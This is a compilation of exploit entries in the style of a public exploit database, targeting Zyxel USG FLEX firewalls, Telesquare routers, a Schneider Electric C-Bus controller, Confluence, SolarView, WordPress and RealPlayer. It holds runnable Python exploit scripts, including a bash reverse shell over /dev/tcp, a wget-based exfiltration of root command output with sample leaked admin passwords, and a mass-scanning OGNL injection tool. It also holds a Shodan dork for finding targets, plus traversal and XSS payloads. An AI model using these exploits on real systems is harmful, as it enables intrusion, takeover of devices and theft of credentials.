# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection # Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800" # Date: May 18th 2022 # Exploit Author: Valentin Lobstein # Vendor Homepage: https://www.zyxel.com # Version: ZLD5.00 thru ZLD5.21 # Tested on: Linux # CVE: CVE-2022-30525 from requests.packages.urllib3.exceptions import InsecureRequestWarning import sys import json import base64 import requests import argparse parser = argparse.ArgumentParser( prog="CVE-2022-30525.py", description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444", ) parser.add_argument("-u", dest="url", help="Specify target URL") parser.add_argument("-r", dest="host", help="Specify Remote host") parser.add_argument("-p", dest="port", help="Specify Remote port") args = parser.parse_args() banner = ( "ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7" "LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg" "ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg" "LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8" "ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg" "KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n" "ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp" "biA6KSApCg==" ) def main(): print("\n" + base64.b64decode(banner).decode("utf-8")) if None in vars(args).values(): print(f"[!] Please enter all parameters !") parser.print_help() sys.exit() if "http" not in args.url: args.url = "https://" + args.url args.url += "/ztp/cgi-bin/handler" exploit(args.url, args.host, args.port) def exploit(url, host, port): headers = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0", "Content-Type": "application/json", } data = { "command": "setWanPortSt", "proto": "dhcp", "port": "4", "vlan_tagged": "1", "vlanid": "5", "mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";', "data": "hi", } requests.packages.urllib3.disable_warnings(InsecureRequestWarning) print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}") try: response = requests.post( url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5 ) except (KeyboardInterrupt, requests.exceptions.Timeout): print("[!] Bye Bye hekcer !") sys.exit(1) finally: try: print("[!] Can't exploit the target ! Code :", response.status_code) except: print("[!] Enjoy your shell !!!") if __name__ == "__main__": main()

# Exploit Title: Microweber CMS 1.2.15 - Account Takeover # Date: 2022-05-09 # Exploit Author: Manojkumar J # Vendor Homepage: https://github.com/microweber/microweber # Software Link: https://github.com/microweber/microweber/releases/tag/v1.2.15 # Version: <=1.2.15 # Tested on: Windows10 # CVE : CVE-2022-1631 # Description: Microweber Drag and Drop Website Builder E-commerce CMS v1.2.15 Oauth Misconfiguration Leads To Account Takeover. # Steps to exploit: 1. Create an account with the victim's email address. Register endpoint: https://target-website.com/register# 2. When the victim tries to login with default Oauth providers like Google, Github, Microsoft, Twitter, Linkedin, Telegram or Facebook etc(auth login) with that same e-mail id that we created account before, via this way we can take over the victim's account with the recently created login credentials.

#!/usr/bin/python3 # Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection # Date: 24th May 2022 # Exploit Author: Bryan Leong <NobodyAtall> # Vendor Homepage: http://telesquare.co.kr/ # CVE : CVE-2021-46422 # Authentication Required: No import requests import argparse import sys from xml.etree import ElementTree def sysArgument(): ap = argparse.ArgumentParser() ap.add_argument("--host", required=True, help="target hostname/IP") args = vars(ap.parse_args()) return args['host'] def checkHost(host): url = "http://" + host print("[*] Checking host is it alive?") try: rsl = requests.get(url) print("[*] The host is alive.") except requests.exceptions.Timeout as err: raise SystemExit(err) def exploit(host): url = "http://" + host + "/cgi-bin/admin.cgi?Command=sysCommand&Cmd=" #checking does the CGI exists? rsl = requests.get(url) if(rsl.status_code == 200): print("[*] CGI script exist!") print("[*] Injecting some shell command.") #1st test injecting id command cmd = "id" try: rsl = requests.get(url + cmd, stream=True) xmlparser = ElementTree.iterparse(rsl.raw) cmdRet = [] for event, elem in xmlparser: if(elem.tag == 'CmdResult'): cmdRet.append(elem.text) except: print("[!] No XML returned from CGI script. Possible not vulnerable to the exploit") sys.exit(0) if(len(cmdRet) != 0): print("[*] There's response from the CGI script!") print('[*] System ID: ' + cmdRet[0].strip()) print("[*] Spawning shell. type .exit to exit the shell", end="\n\n") #start shell iteration while(True): cmdInput = input("[SDT-CW3B1 Shell]# ") if(cmdInput == ".exit"): print("[*] Exiting shell.") sys.exit(0) rsl = requests.get(url + cmdInput, stream=True) xmlparser = ElementTree.iterparse(rsl.raw) for event, elem in xmlparser: if(elem.tag == 'CmdResult'): print(elem.text.strip()) print('\n') else: print("[!] Something doesn't looks right. Please check the request packet using burpsuite/wireshark/etc.") sys.exit(0) else: print("[!] CGI script not found.") print(rsl.status_code) sys.exit(0) def main(): host = sysArgument() checkHost(host) exploit(host) if __name__ == "__main__": main()

# Exploit Title: Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE) # Exploit Author: LiquidWorm #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 Remote Root Exploit # # # Vendor: Schneider Electric SE # Product web page: https://www.se.com | https://www.clipsal.com # Product details: # - https://www.clipsal.com/Trade/Products/ProductDetail?catno=5500SHAC # - https://www.se.com/ww/en/product/5500AC2/application-controller-spacelogic-cbus-rs232-485-ethernet-din-mount-24v-dc/ # Affected version: CLIPSAL 5500SHAC (i.MX28) # CLIPSAL 5500NAC (i.MX28) # SW: 1.10.0, 1.6.0 # HW: 1.0 # Potentially vulnerable (alternative products/same codebase?): 5500NAC2 and 5500AC2 # SpaceLogic C-Bus # # Summary: The C-Bus Network Automation Controller (5500NAC) and the Wiser # for C-Bus Automation Controller (5500SHAC)) is an advanced controller from # Schneider Electric. It is specifically designed to unite the C-Bus home # automation solution with common household communication protocols, from # lighting and climate control, to security, entertainment and energy metering. # The Wiser for C-Bus Automation Controller manages and controls C-Bus systems # for residential homes or zones within a building and integrates functions # such as heating/cooling, energy/load monitoring and remote control for C-Bus # and Modbus. # # Desc: The automation controller suffers from an authenticated arbitrary # command execution vulnerability. An attacker can abuse the Start-up (init) # script editor and exploit the 'script' POST parameter to insert malicious # Lua script code and execute commands with root privileges that will grant # full control of the device. # # ------------------------------------------------------------------------------ # $ ./c-bus.py http://192.168.0.10 "cat /etc/config/httpd;id" 192.168.0.37 8888 # ---------------------------------------------------------------------- # Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at 15.03.2022 11:26:38 # [*] Starting exfiltration handler on port 8888 # [*] Writing Lua initscript... done. # [*] Running os.execute()... done. # [*] Got request from 192.168.0.10:33522 # [*] Printing target's request: # # b"GET / HTTP/1.1\r\nHost: 192.168.0.37:8888\r\nUser-Agent: \nconfig user # 'admin'\n\toption password 'admin123'\n\nconfig user 'remote'\n\toption # password 'remote'\n\nuid=0(root) gid=0(root) groups=0(root)\r\nConnection: # close\r\n\r\n" # # [*] Cleaning up... done. # # $ # ------------------------------------------------------------------------------ # # Tested on: CPU model: ARM926EJ-S rev 5 (v5l) # GNU/Linux 4.4.115 (armv5tejl) # LuaJIT 2.0.5 # FlashSYS v2 # nginx # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Macedonian Information Security Research and Development Laboratory # Zero Science Lab - https://www.zeroscience.mk - @zeroscience # # # Advisory ID: ZSL-2022-5707 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5707.php # # # 12.03.2022 # import threading#! import datetime##! import requests##! import socket####! import time######! import sys#######! import re########! from requests.auth import HTTPBasicAuth from time import sleep as spikaj class Wiser: def __init__(self): self.headers = None self.uri = '/scada-main/scripting/' self.savs = self.uri + 'save' self.runs = self.uri + 'run' self.start = datetime.datetime.now() self.start = self.start.strftime('%d.%m.%Y %H:%M:%S') self.creds = HTTPBasicAuth('admin', 'admin123') def memo(self): if len(sys.argv) != 5: self.use() else: self.target = sys.argv[1] self.execmd = sys.argv[2] self.localh = sys.argv[3] self.localp = int(sys.argv[4]) if not 'http' in self.target: self.target = 'http://{}'.format(self.target) def exfil(self): print('[*] Starting exfiltration handler on port {}'.format(self.localp)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0', self.localp)) while True: try: s.settimeout(9) s.listen(1) conn, addr = s.accept() print('[*] Got request from {}:{}'.format(addr[0], addr[1])) data = conn.recv(2003) print('[*] Printing target\'s request:') print('\n%s' %data) except socket.timeout as p: print('[!] Something\'s not right. Check your port mappings!') break s.close() self.clean() def mtask(self): konac = threading.Thread(name='thricer.exe', target=self.exfil) konac.start() self.byts() def byts(self): self.headers = { 'Referer':self.target+'/scada-main/main/editor?id=initscript', 'Sec-Ch-Ua':'"(Not(A:Brand";v="8", "Chromium";v="98"', 'Cookie':'x-logout=0; x-auth=; x-login=1; pin=', 'Content-Type':'text/plain;charset=UTF-8', 'User-Agent':'SweetHomeAlabama/2003.59', 'X-Requested-With':'XMLHttpRequest', 'Accept-Language':'en-US,en;q=0.9', 'Accept-Encoding':'gzip, deflate', 'Sec-Ch-Ua-Platform':'"Windows"', 'Sec-Fetch-Site':'same-origin', 'Connection':'keep-alive', 'Sec-Fetch-Dest':'empty', 'Sec-Ch-Ua-Mobile':'?0', 'Sec-Fetch-Mode':'cors', 'Origin':self.target, 'Accept':'*/*', 'sec-gpc':'1' } self.loada = '\x64\x61\x74\x61\x3D\x7B' # data={ self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x34\x22\x3A\x22\x22\x2C' # "ext-comp-1004":"", self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35\x22\x3A\x22\x22\x2C' # "ext-comp-1005":"", self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x22\x3A\x22\x22\x2C' # "ext-comp-1006":"", self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x37\x22\x3A\x22\x22\x2C' # "ext-comp-1007":"", self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x38\x22\x3A\x22\x22\x2C' # "ext-comp-1008":"", self.loada += '\x22\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70\x2D\x73\x65\x61\x72\x63\x68\x22\x3A\x22\x22\x2C' # "scada-help-search":"", self.loada += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x2C' # "id":"initscript", self.loada += '\x22\x73\x63\x72\x69\x70\x74\x22\x3A\x6E\x75\x6C\x6C\x2C' # "script":null, self.loada += '\x22\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C\x79\x22\x3A\x22\x74\x72\x75\x65\x22\x7D' # "scriptonly":"true"} self.loada += '\x26\x73\x63\x72\x69\x70\x74\x3D\x6F\x73\x2E\x65\x78\x65\x63\x75\x74\x65' # &script=os.execute self.loada += '\x28\x27\x77\x67\x65\x74\x20\x2D\x55\x20\x22\x60' # ('wget -U "` self.loada += self.execmd # [command input] self.loada += '\x60\x22\x20' # `". self.loada += self.localh+':'+str(self.localp) # [listener input] self.loada += '\x27\x29' # ') self.loadb = '\x64\x61\x74\x61\x3D\x7B' # data={ self.loadb += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x7D' # "id":"initscript"} print('[*] Writing Lua initscript... ', end='') sys.stdout.flush() spikaj(0.7) htreq = requests.post(self.target+self.savs, data=self.loada, headers=self.headers, auth=self.creds) if not 'success' in htreq.text: print('didn\'t work!') exit(17) else: print('done.') print('[*] Running os.execute()... ', end='') sys.stdout.flush() spikaj(0.7) htreq = requests.post(self.target+self.runs, data=self.loadb, headers=self.headers, auth=self.creds) if not 'success' in htreq.text: print('didn\'t work!') exit(19) else: print('done.') def splash(self): Baah_loon = ''' ###### ########## ###### _\_ ##===----[.].] #( , _\\ # )\__| \ / `-._``-' >@ | | | | | Schneider Electric C-Bus SmartHome Automation Controller | Root Remote Code Execution Proof of Concept | ZSL-2022-5707 | | | ''' print(Baah_loon) def use(self): self.splash() print('Usage: ./c-bus.py [target] [cmd] [lhost] [lport]') exit(0) def clean(self): print('\n[*] Cleaning up... ', end='') sys.stdout.flush() spikaj(0.7) self.headers = {'X-Requested-With':'XMLHttpRequest'} self.blank = '\x64\x61\x74\x61\x3D\x25\x37\x42\x25\x32\x32' self.blank += '\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30' self.blank += '\x30\x34\x25\x32\x32\x25\x33\x41\x25\x32\x32' self.blank += '\x25\x32\x32\x25\x32\x43\x25\x32\x32\x65\x78' self.dlank = '\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35' self.dlank += '\x25\x32\x32\x25\x33\x41\x25\x32\x32\x25\x32' self.dlank += '\x32\x25\x32\x43\x25\x32\x32\x65\x78\x74\x2D' self.dlank += '\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x25\x32' self.clank = '\x32\x25\x33\x41\x25\x32\x32\x25\x32\x32\x25' self.clank += '\x32\x43\x25\x32\x32\x65\x78\x74\x2D\x63\x6F' self.clank += '\x6D\x70\x2D\x31\x30\x30\x37\x25\x32\x32\x25' self.clank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43' self.slank = '\x25\x32\x32\x65\x78\x74\x2D\x63\x6F\x6D\x70' self.slank += '\x2D\x31\x30\x30\x38\x25\x32\x32\x25\x33\x41' self.slank += '\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25\x32' self.slank += '\x32\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70' self.glank = '\x2D\x73\x65\x61\x72\x63\x68\x25\x32\x32\x25' self.glank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43' self.glank += '\x25\x32\x32\x69\x64\x25\x32\x32\x25\x33\x41' self.glank += '\x25\x32\x32\x69\x6E\x69\x74\x73\x63\x72\x69' self.hlank = '\x70\x74\x25\x32\x32\x25\x32\x43\x25\x32\x32' self.hlank += '\x73\x63\x72\x69\x70\x74\x25\x32\x32\x25\x33' self.hlank += '\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25' self.hlank += '\x32\x32\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C' self.flank = '\x79\x25\x32\x32\x25\x33\x41\x25\x32\x32\x74' self.flank += '\x72\x75\x65\x25\x32\x32\x25\x37\x44'#######' self.clear = f'{self.blank}{self.dlank}{self.clank}{self.slank}{self.glank}{self.hlank}{self.flank}' htreq = requests.post(self.target+self.savs, data=self.clear, headers=self.headers, auth=self.creds) if not 'success' in htreq.text: print('didn\'t work!') exit(18) else: print('done.') exit(-1) def main(self): print('-'*70) print('Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at', self.start) self.memo(), self.mtask() if __name__ == '__main__': Wiser().main()

# Exploit Title: SolarView Compact 6.00 - Directory Traversal # Date: 2022-05-15 # Exploit Author: Ahmed Alroky # Author Company : Aiactive # Author linkedin profile : https://www.linkedin.com/in/ahmedalroky/ # Version: ver.6.00 # Vendor home page : https://www.contec.com/ # Authentication Required: No # CVE : CVE-2022-29298 # Tested on: Windows # Exploit: http://IP_ADDRESS/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg

# Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS) # Date: 2022-06-05 # Exploit Author: Sanjay Singh # Vendor Homepage: https://motopress.com/ # Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip # Version: 4.2.4 # Tested on: Windows/XAMPP ########################################################################### PoC: 1. http://localhost/wp-admin/edit.php?post_type=mphb_room_type 2. Click on "Add Accommodation Type". 3. Add title payload= "><script>alert("XSS")</script> 4. Excerpt input payload "><script>alert("XSS")</script> 5. Click publish. 6. Visit http://localhost/accommodations/ 7. XSS payload execute.

# Exploit Title: Confluence Data Center 7.18.0 - Remote Code Execution (RCE) # Google Dork: N/A # Date: 06/006/2022 # Exploit Author: h3v0x # Vendor Homepage: https://www.atlassian.com/ # Software Link: https://www.atlassian.com/software/confluence/download-archives # Version: All < 7.4.17 versions before 7.18.1 # Tested on: - # CVE : CVE-2022-26134 # https://github.com/h3v0x/CVE-2022-26134 #!/usr/bin/python3 import sys import requests import optparse import multiprocessing from requests.packages import urllib3 from requests.exceptions import MissingSchema, InvalidURL urllib3.disable_warnings() requestEngine = multiprocessing.Manager() session = requests.Session() global paramResults paramResults = requestEngine.list() globals().update(locals()) def spiderXpl(url): globals().update(locals()) if not url.startswith('http'): url='http://'+url headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "Connection": "close", "Accept-Encoding": "gzip, deflate"} try: response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False) if(response.status_code == 302): print('Found: '+url+' // '+ response.headers['X-Cmd-Response']) inputBuffer = str(response.headers['X-Cmd-Response']) paramResults.append('Vulnerable application found:'+url+'\n''Command result:'+inputBuffer+'\n') else: pass except requests.exceptions.ConnectionError: print('[x] Failed to Connect: '+url) pass except multiprocessing.log_to_stderr: pass except KeyboardInterrupt: print('[!] Stoping exploit...') exit(0) except (MissingSchema, InvalidURL): pass def banner(): print('[-] CVE-2022-26134') print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \n') def main(): banner() globals().update(locals()) sys.setrecursionlimit(100000) if not optionsOpt.filehosts: url = optionsOpt.url spiderXpl(url) else: f = open(optionsOpt.filehosts) urls = map(str.strip, f.readlines()) multiReq = multiprocessing.Pool(optionsOpt.threads_set) try: multiReq.map(spiderXpl, urls) multiReq.close() multiReq.join() except UnboundLocalError: pass except KeyboardInterrupt: exit(0) if optionsOpt.output: print("\n[!] Saving the output result in: %s" % optionsOpt.output) with open(optionsOpt.output, "w") as f: for result in paramResults: f.write("%s\n" % result) f.close() if __name__ == "__main__": parser = optparse.OptionParser() parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)') parser.add_option('-f', '--file', dest="filehosts", help='example.txt') parser.add_option('-t', '--threads', dest="threads_set", type=int,default=10) parser.add_option('-m', '--maxtimeout', dest="timeout", type=int,default=8) parser.add_option('-o', '--output', dest="output", type=str, default='exploit_result.txt') parser.add_option('-c', '--cmd', dest="command", type=str, default='id') optionsOpt, args = parser.parse_args() main()

# Exploit Title: Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE) # Google Dork: n/a # Date: May 31, 2022 # Exploit Author: Eduardo Braun Prado # Vendor Homepage: http://real.com/ # Software Link: http://real.com/ # Version: v.20.0.8.310 # Tested on: Windows 7, 8.1, 10 # CVE : N/A Full PoC: https://github.com/Edubr2020/RealPlayer_G2_RCE Real Player G2 Control component contains a remote code execution vulnerability because it allows 'javascript:' URIs to be passed as the argument, which is usually not safe because in some scenarios could allow injection of script code in arbitrary domains (Universal Cross Site Scripting - uXSS) which can potentially be used to eg. steal cookies among other things. By setting the 'URL' parameter to 'javascript:' URI and the 'target' parameter to an 'iframe' html element, it´s possible to cause javascript code to run in the context of a local error page displayed after using the very same Control to navigate to an invalid URI such as 'mhtml:http://%SERVER%/frame.htm': when an 'mhtml:' URI is invoked by MS IE rendering engine, it expects an MHTML file with an extension whose MIME type is set to "message/rfc822", which is the case for '.mht' files; '.htm' files have its MIME set to 'text/html' and thus IE will cancel loading the document and display a local error page (navigation cancelled). The local error page address is 'res://ieframe.dll/navcancl.htm' which belongs to the 'My computer' security zone of IE / Windows which allows reading of arbitrary local files and also arbitrary code execution by design. Prohibiting the 'javascript:' URI in the control mitigates the issue. The PoC uses the 'SYSMON' ActiveX control to plant an HTA file to the user´s startup folder, which will be executed on next logon or boot. an HTA file can contain code to eg. download or extract an embedded EXE file and run it. The PoC assumes Real Player has its current working directory set to a subdirectory of the user´s home directory. Upon downloading files using eg. web browsers, they will be downloaded to the user´s 'Downloads' folder by default, so we don´t need to retrieve the Windows user name to be able to plant the HTA file in the startup folder. This is just for convenience purposes as it´s possible to retrieve this info through a variety of ways, including the MS Web Browser ActiveX. Vulnerability can be exploited by opening a Real Player playlist file such as RAM files. To reproduce the issue, do the following: a) Setup a web server b) on the web server root directory, extract the "RP_G2" folder to it. c) open the just extracted "RP_G2" folder and then open the following files in a text editor: "poc.htm", "sm_rpx.js", "start.ram". Just replace every occurance of the string %SERVER% with the actual web server´s IP address (on each of the files) d) make sure the web server is accessible and all involved files too. on MS IIS web server you may need to add a new extension and associate it with a MIME type, so do it to associate the .RAM extension with the MIME "audio/x-pn-realaudio". e) on the client side (victim), open the web browser and download the "start.ram" file (or can be accessed eg. using a URL protocol such as 'rtsp:') and open it. You should see an HTA file being planted in the user´s startup folder after a few seconds. Note: to open startup folder do this: open the "Run" menu and then type: shell:Startup

# Exploit Title: Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE) # Google Dork: n/a # Date: May 31, 2022 # Exploit Author: Eduardo Braun Prado # Vendor Homepage: http://real.com/ # Software Link: http://real.com/ # Version: ver. 16.00.282, 16.0.3.51, Cloud 17.0.9.17, v.20.0.7.309 # Tested on: Windows 7, 8.1, 10 # CVE : N/A PoC: https://github.com/Edubr2020/RP_Import_RCE/raw/main/RP_Import_RCE.zip vídeo: https://youtu.be/CONlijEgDLc Real Player uses Microsoft Internet Explorer functionality and exposes properties and methods through a special mean which is application specific: The 'external' object and it exposes several custom methods and properties. The 'Import()' method is handled in unsafe way regarding the 'Copy to My Music' parameter, which allows for arbitrary file types downloading which could be unsafe as only audio/image/video types should be allowed to download to the user´s disk. Additionally it does not properly sanitize file paths allowing planting of arbitrary files on arbitrary locations. Even though it displays an error because it cannot render the downloaded file, the file remains until the user closes the dialog box. Additionally when opening new windows, Real Player looks for an old, obsolete IE library (shdoclc.dll), which can also be abused to run code automatically without needing to wait until reboot (true when file is planted in 'startup' folder). The attacker needs to host the files to be copied/downloaded in an SMB or WebDav share. The directory 'appdata' must be placed in the share's root. The PoC will drop 'shdoclc.dll' (has simple code to run 'cmd.exe' at 'DllMain()' for demonstration purposes) to the user´s 'windowsapps' folder and 'write.exe' to 'startup' folder, so it works universally (any Windows version from at least XP up to 11) tested on RP ver. 16.00.282, 16.0.3.51, Cloud 17.0.9.17, v.20.0.7.309

# Exploit Title: Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS) # Date: 2022-06-01 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://www.avantune.com # Software Link: https://www.genialcloud.com - https://www.genialcloud.com/discover-genialcloud-proj - https://store.genialcloud.com # Version: 10 # Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.39) # CVE: CVE-2022-29296 Reflected Cross-Site Scripting (XSS) vulnerability in login-portal webpage of Genialcloud ProJ (and potentially in other platforms from the same software house "Avantune" since codebase seems shared with their other products: Facsys and Analysis) allows remote attacker to inject and execute arbitrary web scripts or HTML via a crafted payload. Request parameters affected is "msg". PoC Request: GET /eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3Balert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F HTTP/1.1 Host: [REDACTED] Cookie: ASP.NET_SessionId=3recnmmlpo1glzzyejdoezk2 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36 Connection: close Cache-Control: max-age=0 PoC Response: HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/10.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Wed, 11 May 2022 10:51:10 GMT Connection: close Content-Length: 8162 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><link rel="stylesheet" ...[SNIP]... <script type="text/javascript"> var Msg = 'Invalid username or password';alert("y0! XSS here :)")//';</script> ...[SNIP]...